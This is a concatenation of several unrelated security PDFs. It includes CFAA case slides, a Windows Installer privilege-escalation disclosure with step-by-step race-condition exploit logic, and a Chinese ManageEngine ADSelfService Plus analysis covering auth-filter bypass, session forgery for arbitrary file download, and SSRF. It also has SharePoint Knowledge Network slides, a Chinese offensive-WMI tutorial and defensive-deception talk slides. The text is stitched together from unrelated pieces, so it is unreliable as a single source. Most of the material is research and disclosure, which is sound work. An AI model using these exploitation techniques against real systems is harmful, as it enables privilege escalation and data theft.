Cal., June 9, 2006)
Plaintiff alleged that the CEO stole confidential and proprietary
information from the corporation; breach of contract; breach of fiduciary
duty; theft of trade secret; and violation of the Computer Fraud and
Abuse Act (CFAA)
Corporation was an electrical engineering company involved in the
manufacture and sale of integrated circuits. CEO counterclaims against
the corporation for declaratory relief regarding ownership of the
intellectual property, misappropriation, unjust enrichment, and
intentional interference with contract relations and prospective economic
advantage.
Ownership of the underlying technology rested with the corporation.
Court noted former CEO signed a valid employee agreement, which
contained a confidentiality provision that CEO breached when he
removed and destroyed provisional patent information from the
corporation's files and property. CEO's unauthorized destruction of the
corporation's electronic files entitled the corporation to summary
judgment on the CFAA claim.
Corporate Espionage
Oracle Corp. v. SAP AG, (N.D. Cal. Filed March 22, 2007)
Eleven Claims for Relief
Violation of CFAA 18 U.S.C. § 1030(a)(2)(C) & (a)(4) & (a)(5)
Intentional interference with Prospective Economic Advantage
Conversion
Trespass to Chattels
Alleges SAP infiltrated Oracle’s systems by using log-in
information of defecting customers and concealed true identity
using phony telephone numbers and false e-mail addresses.
Oracle alleges more than 10,000 illegal downloads traced to IP
address in SAP Byran, Texas headquarters.
Contact Information
[email protected] | pdf |
MSI - Microsoft Windows Installer Elevation of Privilege
Summary: The Microsoft Windows Installer permits under some circumstances to a “standard user” an arbitrary
permissions and content overwrite with SYSTEM privileges.
( Microsoft Windows Installer: https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-portal )
Products affected: Windows 10 Enterprise (1903) with latest security update (2019 November patch) and probably
also other versions (not tested). Windows 10 Enterprise - INSIDER PREVIEW (Fast ring) 10.0.19033 - Build 19033
Description:
It is possible and allowed by “Windows Installer service” to install a MSI package as “standard user”.
I have noticed, in my research, that when a “standard user” installs a MSI package , the “Windows Installer
service” triggers some operations with SYSTEM privileges. (see image below from Procmon)
Going forward with my research I found that, after a package is installed on the system, a “standard user” could
force a repair of the product with “/f” command line parameter.
In our case, for example, command “msiexec /qn /fa foo.msi” triggers the repair operation .
With this command I’ve seen a couple of interesting operations came out that caught my attention.
As SYSTEM, the “Windows Installer service” try to set the permissions of the package files that are going to be
reinstalled.
After that, it read and writes the content of the package files ( stored within msi package ).
See image below from Procmon.
As we can see, the first time “Windows Installer service” tries to open one the files impersonating the “standard
user” but as a result it gets a “PRIVILEGE NOT HELD”, then, after that, it closes the file and reopens it as SYSTEM
without impersonating! Afterward it continues to set the permissions of the file as SYSTEM and writes its content.
This is clearly a point of possible exploitation! In order to obtain the desired a result, a “race condition” has to be
successfully exploited. The “race condition” is going to occur between the moment when “Windows Installer
service” closes the file as “standard user” and reopens it as SYSTEM just before it writes the DACLs and the
content.
Now that the logical workflow seems a little bit clear (I hope), I’ll try to describe the steps executed by the exploit.
First of all: I’ve built a MSI package (foo.msi) that can be installed also as a “standard user”; this means that MSI
service will install all files in C:\Users\[USER]\AppData\Local . In our particular case, I’ve built this MSI package
which installs only the file “foo.txt” into C:\Users\[USER]\AppData\Local\fakemsi\ directory (C# VS2017 project
will also be sent with this report).
In order to make the MSI package installable by “standard user”, I’ve run against it the following command:
"C:\Program Files (x86)\Windows Kits\10\bin\10.0.17763.0\x86\MsiInfo.exe"
"C:\temp2\Setup1\Setup1\Debug\foo.msi" -w 10
(MsiInfo belongs to WDK, so watch out for your version
REF : https://docs.microsoft.com/en-us/windows/win32/msi/msiinfo-exe)
These are the steps that the exploit performs:
-
Before exploits removes temporary old directories used for junctions.
-
Create an empty directory C:\Users\[USER]\foomsi
-
Create empty directory C:\Users\[USER]\AppData\Local\fakemsi ; this is the directory that MSI package will
create in order to save “foo.txt” file
-
Create a junctions from C:\Users\[USER]\AppData\Local\fakemsi to C:\Users\[USER]\foomsi (MSI service
will not delete it) so later we can abuse of this junction to gain privileges. That’s a trickie part.
-
Create a sort of symbolic link in “\RPC Control” object namespace. This link will be named “foo.txt” and it
points to the file we want to own (c:\windows\win.ini in this case)
-
Remove the msi package (even if it doesn’t exist): command “msiexec /qn /i foo.msi”
-
Install the msi package: command “msiexec /qn /i foo.msi“
-
Start thread to win the race condition and just after milliseconds triggers Window Installer service with
command “msiexec /qn /fa foo.msi” in order to exploit “setSecurity” operation and win the race.
-
Thread starts watching for C:\Users\[USER]\AppData\Local\fakemsi\foo.txt existance
-
As soon as C:\Users\[USER]\AppData\Local\fakemsi\foo.txt has been renamed by MSI service, and it does
not exist anymore, the exploit will set a reparse point (a junction) from
C:\Users\[USER]\AppData\Local\fakemsi\ to “\RPC Control”
-
At this point, MSI service creates again C:\Users\[USER]\AppData\Local\fakemsi\foo.txt , and it will
REPARSE to “\RPC Control” where there is “foo.txt” file that is a link pointing to the target file, in this way
it’s going to exploit setSecurity operation (we’ll gain file content overwrite too). That’s the core of the race
condition (and of the exploit) that we’ll try to win; matters of milliseconds
-
Below a screenshot (from procmon) of a successful exploitation. I have marked all the importation
operations that can be observed:
1) MSI service executes “CreateFile” successfully impersonating “normal” user.
2) Exploit sets mountpoint from C:\Users\[USER]\AppData\Local\fakemsi\ to “\RPC Control”
3) MSI service does a REPARSE to target file (C:\windows\win.ini in this case) and executes “CreateFile”
successfully as SYSTEM user
4) MSI service sets security DACL as SYSTEM ; it gives FULL CONTROL to the “normal” user to the target file.
5) MSI service writes content read from “foo.txt” file inside foo.msi package.
This exploit can overwrite DACL of files that are fully owned by SYSTEM.
Most of the times, in my tests, the exploit works at first time… If it doesn’t work at the first time, try to re-run
again, it should be work.
I have provided a full working PoC:
- Pay attention, all files in “bin_MsiExploit” need to stay on the same directory. (please read readme.txt inside
zipped file)
All the source code needed:
- exploit source code - VS 2017 C++ (src_MsiExploit directory)
- msi package source code - VS 2017 C# already provided in previous emails
Screens shots:
Successfully exploitation on Windows 10 Enterprise Insider Preview (Fast ring) 10.0.19033
Conclusions:
I think that bug stands behind an incorrect impersonated operation when it comes to write the DACLs.
Best Regards,
Christian Danieli (@padovah4ck) | pdf |
1
Zoho ManageEngine ADSelfService Plus
偶然看到这篇⽂章勾起了好奇
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-
adselfservice-plus.html
这⾥说⽂件上传和命令注⼊没修,我想着看他上⾯修复的权限绕过感觉有问题于是找了个最新版测试
结果找错了版本⽩⼲了⼀天活,我在他中⽂官⽹下载的最新版为6115版本
下⾯讲的都是6115才回出现的问题,实际上官⽅最新为6117版本,在6116版本的安全过滤器
范围直接变为*
⼀、前⾔
2
导致很多都洞⽆法利⽤了,这个过滤器看了下基本没法绕,你访问的URI不在安全配置⾥定义
直接报错,参数名不⼀致,参数值不在限定范围直接报错,基本上exclude也利⽤不了
这篇⽂章⾥提到
⼆、权限绕过bypass
3
官⽅写了个getNormalizedURI 来修复权限绕过,我当时看着就有问题,我们先跟⼀下这个过滤器
在web.xml⾥定义了⼀个 filter
Plain Text
复制代码
<filter>
<filter-name>ADSFilter</filter-name>
<filter-class>com.manageengine.ads.fw.filter.ADSFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>ADSFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>FORWARD</dispatcher>
<dispatcher>REQUEST</dispatcher>
</filter-mapping>
1
2
3
4
5
6
7
8
9
10
4
ADSFilter代码如下
这⾥意味着我们必须是 doSubFilters ⽅法返回为正才能通过这个过滤器。
在 doSubFilters ⽅法中存在这样⼀段
跟⼊ RestAPIUtil.isRestAPIRequest
Java
复制代码
public void doFilter(ServletRequest servletRequest, ServletResponse
servletResponse, FilterChain filterChain) throws IOException,
ServletException {
HttpServletRequest request = (HttpServletRequest)servletRequest;
HttpServletResponse response =
(HttpServletResponse)servletResponse;
boolean haveSetCredential =
RestAPI.setUserCredentialsForRestAPI(request, this.filterParams);
if (this.doSubFilters(servletRequest, servletResponse,
filterChain)) {
filterChain.doFilter(request, response);
}
if (haveSetCredential) {
AuthUtil.flushCredentials();
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
Java
复制代码
if (RestAPIUtil.isRestAPIRequest(request, this.filterParams) &&
!RestAPIFilter.doAction(servletRequest, servletResponse,
this.filterParams, this.filterConfig)) {
return false;
}
1
2
3
5
此处直接使⽤ getRequestURI 来获取请求路径,使⽤ "/RestAPI/.*" 来匹配,所以就有了最开始的
/./RestAPI/xxx 来绕过,新版增加了⼀个安全⽅法 getNormalizedURI 来处理路径
Java
复制代码
public static boolean isRestAPIRequest(HttpServletRequest request,
JSONObject filterParams) {
String restApiUrlPattern = "/RestAPI/.*";
try {
restApiUrlPattern = filterParams.optString("API_URL_PATTERN",
restApiUrlPattern);
} catch (Exception var5) {
out.log(Level.INFO, "Unable to get API_URL_PATTERN.", var5);
}
String reqURI = request.getRequestURI();
String contextPath = request.getContextPath() != null ?
request.getContextPath() : "";
reqURI = reqURI.replace(contextPath, "");
reqURI = reqURI.replace("//", "/");
return Pattern.matches(restApiUrlPattern, reqURI);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
6
Java
复制代码
public static String getNormalizedURI(String path) {
if (path == null) {
return null;
} else {
String normalized = path;
if (path.indexOf(92) >= 0) {
normalized = path.replace('\\', '/');
}
if (!normalized.startsWith("/")) {
normalized = "/" + normalized;
}
boolean addedTrailingSlash = false;
if (normalized.endsWith("/.") || normalized.endsWith("/..")) {
normalized = normalized + "/";
addedTrailingSlash = true;
}
while(true) {
int index = normalized.indexOf("/./");
if (index < 0) {
while(true) {
index = normalized.indexOf("/../");
if (index < 0) {
if (normalized.length() > 1 &&
addedTrailingSlash) {
normalized = normalized.substring(0,
normalized.length() - 1);
}
return normalized;
}
if (index == 0) {
return null;
}
int index2 = normalized.lastIndexOf(47, index -
1);
normalized = normalized.substring(0, index2) +
normalized.substring(index + 3);
}
}
normalized = normalized.substring(0, index) +
normalized.substring(index + 2);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
7
其实直接采⽤下⾯的⽅式就能继续绕。
直接URL编码RestAPI也能绕
看⽂章说的⽂件上传和命令注⼊没修复,想着这不是直接能RCE,然后发现是我想多了。
先看 /RestAPI/* 的定义
三、⽂件上传和命令参数注⼊
1、RestAPI
}
}
44
45
8
2.⽂件上传
XML
复制代码
<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>/RestAPI/*</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>action</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>/WEB-INF/struts-config.xml, /WEB-INF/accounts-struts-
config.xml, /adsf/struts-config.xml, /WEB-INF/api-struts-config.xml, /WEB-
INF/mobile/struts-config.xml</param-value>
</init-param>
<init-param>
<param-name>validate</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>chainConfig</param-name>
<param-value>org/apache/struts/tiles/chain-config.xml</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
9
发现这个action已经不在xml⾥定义了,搜了下之前这个对应的class
AdventNetADSMClient.jar!\com\adventnet\sym\adsm\common\webclient\admin\LogonCustomizat
ion.class
10
跟⼊ FileActionHandler.getFileFromRequest 应该是其处理⽂件的⼀个通⽤⽅法
对⽐6113版和最新版代码
11
主要是这⼀段发⽣了变化,最新版⽣成的⽂件为临时⽂件,⽼版为上传⽂件名。
我看了⼀下最新版他这地⽅,如果进⼊if⾥⾯⽣成的⽂件是个临时⽂件,else⾥也是⼀样,但是都保存了上
传的原始⽂件名放在json⾥⽤于后续判断。
12
这⾥会判断你上传的⽂件名是否符合要求,看了⼀下绕不了。
Connection也被从xml中去除,class⽂件还在。
AdventNetADSMClient.jar!\com\adventnet\sym\adsm\common\webclient\admin\Connectio
nAction.class
最后到
com.adventnet.sym.adsm.common.webclient.util.SSLUtil#createCSR(org.json.JSO
NObject)
发现参数注⼊并没有被修复
虽然在action配置移除了Connection但是有其他地⽅能调⽤到 createCSR
com.manageengine.ads.fw.dashboard.DashboardAction#updateSessionAttributes
3.命令参数注⼊
四、⼀些⼩问题
1.任意session属性设置
13
远程⽂件下载
com.manageengine.ads.fw.roboupdate.RoboUpdateAction#download
14
com.manageengine.ads.fw.roboupdate.DownloadPatch#doAction
15
Java
复制代码
public void doAction(Properties patchDetails) throws Exception {
URLConnection connection = null;
FileOutputStream outputStream = null;
File ppmFile = null;
InputStream inputStream = null;
String ppmName = null;
String folder = patchDetails.get("PATCH_LOCATION") != null ?
(String)patchDetails.get("PATCH_LOCATION") : "/Patch/Roboupdate";
folder = RoboUpdateUtil.createFolder(folder);
try {
String httpAddress = patchDetails.get("PPM_URL") != null ?
(String)patchDetails.get("PPM_URL") :
(String)patchDetails.get("PATCH_URL");
URL url = new URL(httpAddress);
String protocolType = url.getProtocol();
if (this.proxySettings != null && this.proxySettings.length()
> 0) {
Proxy proxy = new Proxy(Type.HTTP, new
InetSocketAddress((String)this.proxySettings.get("SERVER_NAME"),
Integer.parseInt(this.proxySettings.get("PORT").toString())));
if (protocolType.equals("http")) {
connection =
(HttpURLConnection)url.openConnection(proxy);
} else {
connection =
(HttpsURLConnection)url.openConnection(proxy);
}
if (this.proxySettings.has("USER_NAME")) {
String encodedUserPwd =
MimeUtility.encodeText((String)this.proxySettings.get("USER_NAME") + ":" +
(String)this.proxySettings.get("PASSWORD"));
((URLConnection)connection).setRequestProperty("Proxy-
Authorization", "Basic " + encodedUserPwd);
}
} else if (protocolType.equals("http")) {
connection = (HttpURLConnection)url.openConnection();
} else {
connection = (HttpsURLConnection)url.openConnection();
}
((URLConnection)connection).setReadTimeout(10000);
((URLConnection)connection).setConnectTimeout(30000);
ppmName = httpAddress.substring(httpAddress.lastIndexOf("/") +
1, httpAddress.length());
ppmFile = new File(folder, ppmName);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
16
当时可能有点懵了,其实设置session属性那⾥,设置的属性类型是String,⽽我们后⾯远程⽂件下载的时
候获取的属性的List会报错所有⾏不通。
2.任意⽂件下载
try {
outputStream = new FileOutputStream(ppmFile);
} catch (FileNotFoundException var17) {
RoboUpdateHandler.setPatchFolderPermission();
folder = RoboUpdateUtil.createFolder(folder);
ppmFile = new File(folder, ppmName);
outputStream = new FileOutputStream(ppmFile);
}
inputStream = ((URLConnection)connection).getInputStream();
int bytesRead = false;
byte[] buffer = new byte[153600];
int bytesRead;
while((bytesRead = inputStream.read(buffer)) != -1) {
outputStream.write(buffer, 0, bytesRead);
}
this.logger.log(Level.INFO, "Successfully downloaded the patch
and stored in " + folder + " folder");
this.downloadStatus = true;
this.filePath = folder + File.separator + ppmName;
} catch (Exception var18) {
this.logger.log(Level.INFO, " ", var18);
throw new Exception(var18);
} finally {
if (inputStream != null) {
inputStream.close();
}
if (outputStream != null) {
outputStream.close();
if (!this.downloadStatus && ppmFile != null &&
ppmFile.exists()) {
ppmFile.delete();
}
}
if (connection != null) {
connection = null;
}
}
}
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
17
com.manageengine.ads.fw.ssl.SSLAction#downloadCSR
跟⼊ com.manageengine.ads.fw.ssl.SSLAPI#downloadCSR
18
通过session属性来获取要下载的⽂件名,结合上⾯的session属性伪造,即可实现任意⽂件下载。
Java
复制代码
public String downloadCSR(HttpServletRequest request, HttpServletResponse
response) throws Exception {
String filename =
(String)request.getSession().getAttribute("CSR_FILE_NAME");
if (filename != null) {
response.setContentType("text/html");
response.setHeader("Content-Disposition", "attachment;
filename=\"" + filename + "\"");
PrintWriter out = response.getWriter();
FileInputStream fileInputStream = new
FileInputStream(SSLConstants.SERVER_HOME + File.separator +
SSLConstants.DEFAULT_CERTIFICATE_DIR + File.separator + filename);
Throwable var6 = null;
try {
int i;
try {
while((i = fileInputStream.read()) != -1) {
out.write(i);
}
} catch (Throwable var15) {
var6 = var15;
throw var15;
}
} finally {
if (fileInputStream != null) {
if (var6 != null) {
try {
fileInputStream.close();
} catch (Throwable var14) {
var6.addSuppressed(var14);
}
} else {
fileInputStream.close();
}
}
}
out.close();
SSLHandler.addMETrackEntry("CSR_DOWNLOAD_COUNT");
}
return null;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
19
⾸先设置session属性获取session
携带此session请求
com.manageengine.ads.fw.ssl.SSLAction#addNewCertificate(org.apache.struts.action.Actio
nMapping, org.apache.struts.action.ActionForm, javax.servlet.http.HttpServletRequest,
javax.servlet.http.HttpServletResponse)
3.⽂件解压
20
com.manageengine.ads.fw.ssl.SSLAPI#addNewCertificate(javax.servlet.http.HttpServletReq
uest, javax.servlet.http.HttpServletResponse, org.json.JSONObject,
org.json.JSONObject)
刚开始以为能shell了,后⾯发现在⽂件上传部分就出问题了。
因为他没有给这个上传配置struts form-bean
21
导致此处的actionform获取不到
从⽽进⼊else⾥
此处会爆 java.lang.ClassCastException:
org.apache.catalina.connector.RequestFacade cannot be cast to
com.adventnet.iam.security.SecurityRequestWrapper 强制类型转换异常
com.manageengine.ads.fw.util.jumpto.JumpToAPI#testConnection
4.⽆回显ssrf
22 | pdf |
Sharepoint Knowledge
Network
A component of Microsoft Office Sharepoint
Server 2007 (MOSS )
Total Information Awareness
Not just for the government anymore
KN is about connecting people
KN is enterprise social networking
KN enables users to collaborate
KN automates the discovery and sharing of
undocumented knowledge and relationships.
KN helps discover Who knows whom? (Connectors)
KN helps discover Who knows what? (Expertise
Location)
KN is an automated tool, to discover expertise within
an organization.
It is not meant to discover the experts, since they are
already well known.
It is mean to discover hidden gems of expertise on any
topic.
“Organically discover expertise to enable an organization to
make better choices quicker”
Microsoft is created KN based on three core
beliefs:
๏ * Most information is undocumented
๏ * It’s difficult to connect to the right person
๏ * “Weak ties” deliver significant value
The Knowledge Network solution is split into a client
and a server that work together to
• (Client) Analyze email to create profile (keywords,
contacts, external contacts)
• (Client) Publish profile to server (incremental updates)
• (Seeker) Aggregate profiles (expertise information,
social network)
• (Seeker) Search for people (who know who? Who
knows what?)
Data Sources for KN
Email
Team sites
Web
IM Contacts
Contact lists
Portaits
My Sites
AD Relationships
Distribution list
Correlation Store
Relationship data sources are inputs for the KN
Correlation Store, which is surfaced through the
browser.
The Correlation Store is also accessible to line-of-
business applications via APIs and an SDK.
Useful software
Microsoft understands that there may be privacy
concerns involving KN. (WOW)
Addresses these concerns involves striking the right
balance among utility, simplicity and privacy.
Utility is how useful will this software be to me?
Simplicity is how easy will this software be to install,
upload, maintain and use?
Privacy is how much personal information will this
software reveal and how much control do I have?
* Communicate steps of the profile creation and
publication process
* Customers can expose privacy policy in the client
profile wizard
Notification
User can choose which items to include/exclude
User can choose from 5 levels of privacy to apply to
each profile item to control who is allowed to view that
information on the server (i.e. everyone (outermost ring
of visibility), my colleagues, my workgroup, my
manager, and me (center of the visibility universe))
Admins can determine which aspects of the product
functionality to leverage including external contacts,
anonymous results, and DL keywords
Control
Control 2
Admins can configure the default operation of the
client, including opt-in/opt-out and the default privacy
visibilities for profile items
KN sends no data to the server before the user has
approved it
Consent
Breaking news
Some blogs report that the KN is not going to be
included in the next version of Sharepoint.
Some blogs report it will be renamed and integrated
more news
KN can be seen as a technological preview.
Posts have indicated possible inclusion in future
versions of Windows and other server products.
The real question is what is MSN/Live/Bing running
behind the scenes, based on our IM, Email, blogs,
news.
What is GOOGLE running........ | pdf |
本篇文章翻译自:Offensive WMI - Exploring Namespaces, Classes & Methods (Part 2) ::
0xInfection's Blog — Random ramblings of an Infected Geek.
本篇文章是 WMI 攻击手法研究的第二篇,主要研究 WMI 中的 3 个组件,在整篇文章中,我们将交替使
用 WMI 和 CIM cmdlet,以便熟悉这两种 cmdlet 类型。
一、命名空间
让我们简单回顾一下命名空间是什么:
命名空间结构信息类似于文件系统中文件夹,但是,与物理位置 (例如磁盘上) 不同,它们本质上
更具有逻辑。
WMI 中的所有命名空间都是 __Namespace 系统类的实例,要获取 root 命名空间下所有命名空间的列
表,可使用以下命令查询同一个类:
Get-WmiObject -Namespace root -Class __Namespace
输出的内容包含了许多信息,为了过滤掉 "无用" 信息,可使用 PowerShell 中的 select :
现在我们从系统中得到一个命名空间的列表,许多命名空间会是这样格式出现 root\<namespace> ,比
如 root\DEFAULT , root\CIM2 等等,因为它们是 root (本身也是一个命名空间) 下的命名空间。
注意:一个奇怪而有趣的事实是,WMI 中的默认命名空间不是 root\DeFAULT 而是 root\CIMV2
(自 Windows 2000 以来一直是这样)。
使用 CIM cmdlet Get-CimInstance 可以实现相同目的:
Get-WmiObject -Namespace root -Class __Namespace | select name
Get-CimInstance -Namespace root -ClassName __Namespace
OK,上面已整整齐齐列出来了,那嵌套的名称空间呢?我们已经看到 root 命名空间下有几个命名空
间,只需要编写一个脚本,递归地获取名称空间 (来自 PSMag):
注意:类和命名空间可能因机器而异,具体取决于可用硬件、安装的应用程序和许多其它因素。
二、类
现在我们有一个可用的命名空间列表,让我们来看看类,那么什么是类?
WMI 类表示系统中的特定项,它可以是从系统进程到硬件 (比如网卡)、服务等任何内容。
类分为 3 个主要类型 (这是 CIM 标准的要求):
Function Get-WmiNamespace {
Param (
$Namespace='root'
)
Get-WmiObject -Namespace $Namespace -Class __NAMESPACE | ForEach-Object {
($ns = '{0}\{1}' -f $_.__NAMESPACE,$_.Name)
Get-WmiNamespace $ns
}
}
Core classes (核心类):适用于所有管理领域,并提供很少的基本功能,它们通常以双下划线开头
(比如 __SystemSecrity );
Common classes (公共类):这些是核心类的扩展,适用于特定的管理领域,以 CIM_ 为前缀 (比如
CIM_TemperatureSensor );
Extended classes (扩展类):这些是对基于技术堆栈的常见类的额外添加 (例如 Win32_Process);
类进一步分为以下类型:
Abstract classes (抽象类):定义新类的模板;
Static classes (静态类):主要用于存储数据;
Dynamic classes (动态类):从 Provider 取回数据,代表 WMI 托管资源,我们最感兴趣的是这种
类型的类;
Association classes (关联类):描述类和托管资源之间的关系;
2.1 列出类
有了足够的理论支撑,让我们尝试寻找一些类,我们可以使用 Get-WmiObject cmdlet 列出可用的类:
上面这条命令将会列出所有类,但为了举例,假设我们对系统上的用户感兴趣。可以使用以下命令来缩
小范围,该命令列出了用于获取或操作用户信息的所有可用类:
同样也可以使用 Get-CimClass 命令也能实现同样的效果,如下所示:
Get-WmiObject -Class * -List
Get-WmiObject -Class *user* -List
Get-CimClass -ClassName *user*
注意:有关所有 Win32 类的列表,可以参考 Microsoft 的类文档。 Win32 Provider 提供 4 个不
同类别的类:计算机系统硬件类、操作系统类、性能计数器类和 WMI 服务管理类。
若要获取动态类,可以使用 Get-CimClass cmdlet 的 -QualiferName 参数:
看起来不错,下一步该如何操作?查询类以从中获取更多东西。
2.2 获取类
我们对 Win32_UserAccount 类感兴趣,通过如下命令可简单获取数据:
Get-CimClass -ClassName "user" -QualifierName dynamic
Get-WmiObject -Class Win32_UserAccount
提示:要获得更详细的输出,可以将上述命令通过管道传输到 Powershell 的 Format-List 或
fl 中,例如: Get-WmiObject -Class Win32_UserAccount | fl *
CIM cmdlet Get-CimInstance 能获取相同的信息:
现在我们有了系统上所有用户帐户的列表!
让我们将注意力转向系统上运行的进程,Win32_Process 类为我们提供了系统上运行的进程列表:
许多进程在系统上运行,这可能会使终端上显示的内容无休止地滚动,这种情况并不少见!为了避免这
种情况,我们可以使用 -Filter 参数来获取我们正在寻找的特定进程 (这里选择了 lsass.exe ):
Get-CimInstance -ClassName Win32_UserAccount
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_Process -Filter 'name="lsass.exe"'
在这种情况下,CIM cmdlet 替代方法 Get-CimInstance 提供了更短、更全面的输出 (并且它还支持 -
Filter 参数):
对 WQL 执行相同操作的表达式如下:
现在我们知道在 WMI 中列出、获取和过滤类的实例,让我们看看在 WMI 中删除实例是如何工作的。
Get-CimInstance -ClassName Win32_Process
Get-WmiObject -Query 'select * from win32_process where name="lsass.exe"'
2.3 删除类实例
Remove-WmiObject (WMI cmdlet) 和 Remove-CimInstance (CIM cmdlet) 是两个具有删除实例功能的
cmdlet。可以将相关命令的输出通过管道传输到 cmdlet。为了快速演示,运行计算器应用程序并列出
过程。
如果我们通过管道将命令传递给 Remove-CimInstance 会发生什么? 进程被杀死!
这在处理 Registry 时非常有用,或者更好,在我们创建自己的类来存储我们的 Payloads 的情况下,我
们可以简单地使用 cmdlet 列出类下的所有项目,从而将它们全部清理干净,一气呵成。
三、方法
方法可操作 WMI 对象,如果向上滚动到我们列出所有可用类的位置,你会注意到一个名为 Methods 的
列,其中列出了可用的方法。
3.1 列出方法
要重复我们的工作并列出所有可用的方法,可以执行以下操作:
为了过滤掉允许我们执行特定方法的实例,可以传递一个方法名称,例如 Create (这总是很有趣,因为
它可能允许我们创建一些东西):
Get-CimInstance -ClassName Win32_Process -Filter 'name="calculator.exe"' |
Remove-CimInstance
Get-CimClass -MethodName *
进一步缩小范围,列出特定类的可用方法,需要使用 Powershell 的 select 和 -ExpandProperty 参
数:
注意:传递给 select 语句的值是我们在列出类时得到的列的名称。如果你感到困惑,请向上滚动
到我们列出类的部分,并观察 WMI 和 CIM cmdlet 输出之间的差异。
因此,对于 Win32_Process 类,我们有 Create 、 Terminate 、 GetOwner 、 GetOwnerSid 等方法。
现在让我们看看如何使用方法。
提示:要使用一个方法,我们需要知道调用该方法时需要提供哪些参数。要列出所有可用参数,我
们可以结合使用 Powershell,或者更好地阅读 文档。
Get-CimClass -MethodName Create
Get-WmiObject -Class Win32_Process -List | select -ExpandProperty Methods
Get-CimClass -ClassName Win32_Process | select -ExpandProperty CimClassMethods
3.2 使用方法
Invoke-WmiMethod (WMI) 和 Invoke-CimMethod (CIM cmdlet) 允许我们使用特定类的方法。又是拿
计算器开刀:
要使用 CIM cmdlet,语法略有不同:
四、设置对象属性
最后但并非最不重要的一点,我们应该看看更新类的实例。但是,重要的是要记住实例应该是可写的。
通过编写一些脚本,我们可以编写一个获取类的所有可写属性的方法。这是脚本 (来自 PSMag):
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList calc.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName create -Arguments
@{commandline="calc.exe"}
对于我们的示例,我们将使用 Win32_OperatingSystem 类,该类具有一个名为 Description 的可写
属性。
让我们使用 Set-WmiInstance 将属性名称更新为 PewOS :
使用 Set-CimInstance 也可以实现相同的效果,但这留给读者去探索。
五、结论
哇,又是一篇长文!到目前为止,我们已经对 WMI 和 CIM cmdlet 以及如何使用它们实现对系统的重要
控制打下了坚实的基础,干杯!
$class = [wmiclass]'<class_name>'
$class.Properties | ForEach-Object {
foreach ($qualifier in $_.Qualifiers) {
if ($qualifier.Name -eq "Write") {
$_.Name
}
}
} | pdf |
Traps
of
Gold
Michael
Brooks
&
Andrew
Wilson
Cau.on.
Please
vet
anything
discussed
with
legal
and
management.
FRUSTRATION
http://www.flickr.com/photos/14511253@N04/4411497087/sizes/o/in/photostream/
Our
en.re
defense
strategy
is
REACTIVE…
AKA,
losing
Fixes
known
issues
Someone
already
pwnd
it
Already
in
Produc@on!
Patch
Management
Reduces
Vulnerabili@es
Expensive
Limited
Effec@veness
Secure
Development
Free
groping
at
airport
You
aren’t
safer
Introduces
vulnerabili@es
Security
Theater
What
is
missing?
But
if
they
aren’t
working…
Fight
Back
http://www.flickr.com/photos/superwebdeveloper/5604789818/
sizes/l/in/photostream/
“
We
conclude
that
there
exists
no
clear
division
between
the
offense
and
defense.
-‐
USMC,
Warfigh.ng
w.flickr.com/photos/travis_simon/
3/sizes/z/in/photostream/
They
have:
AUackers
are
human
too.
• Finite
@me
• Imperfect
tools
• Emo@on
/
Ego
/
Bias
• Risk
AUack
them
there.
So...
“
If
I
have
seen
further,
it
is
only
by
standing
on
the
shoulder
of
giants.
-‐
Sir
Isaac
Newton
Traps
of
Gold
IDS
Systems
Honeypots
Exploits
Attrition
Maneuver
Two
Models
of
Warfare
Maneuverability
http://www.flickr.com/photos/travis_simon/
3865383863/sizes/z/in/photostream/
Stack
the
Deck
http://www.flickr.com/photos/jonathanrh/5817317551/sizes/o/in/photostream/
“
To
act
in
such
a
way
that
the
enemy
does
not
know
what
to
expect.
Ambiguity:
Ambiguity
Server
Banners
File
Extensions
Default
Files
Who
needs
this?
The
browser
doesn’t
care.
Why
leave
these
up?
Shut
up.
If
knowing
is
half
the
baUle
“
Convince
the
enemy
we
are
going
to
do
something
other
than
what
we
are
really
going
to
do
Decep.on
Lie
about
the
rest.
Reduce
what
they
can
know
Blatantly
lying.
Increase
the
noise
by…
Issues
Iden@fied
Before
AUer
19
5462
Nikto
6
300
Skipfish
6
300
Wapiti
6
300
w3af
6
300
Prod
scan
6
300
Prod
scan
6
300
Prod
scan
See
updates
after
talk
That’s
real
though!
Will
it?
But
that
wont
fool
people…
Some
lies
are
beUer.
http://www.flickr.com/photos/randomurl/459180872/sizes/l/in/photostream/
“
The
secrets
of
victory
thus
lie
in
the
taking
of
ini.a.ve.
Ambiguity:
Tempo
It’s
about
awareness
and
ac.ng
sooner.
It’s
not
about
reac.on
Perceived
Actual
AXack
Surface
I
made
this
up!
And
I
can
watch
for
this.
http://www.flickr.com/photos/derek_b/5837741974/sizes/o/in/photostream/
“
I
love
it
when
a
plan
comes
together.
-‐Hannibal
Misdirec@on
ShuYng
down
tools
Increasing
awareness
So
far
we’ve
shown:
Can
we
break
it?
But…
http://www.flickr.com/photos/20106852@N00/2238271809/sizes/o/in/photostream/
To
recap.
Stop
ac.ng
like
this…
Start
ac.ng
like
this.
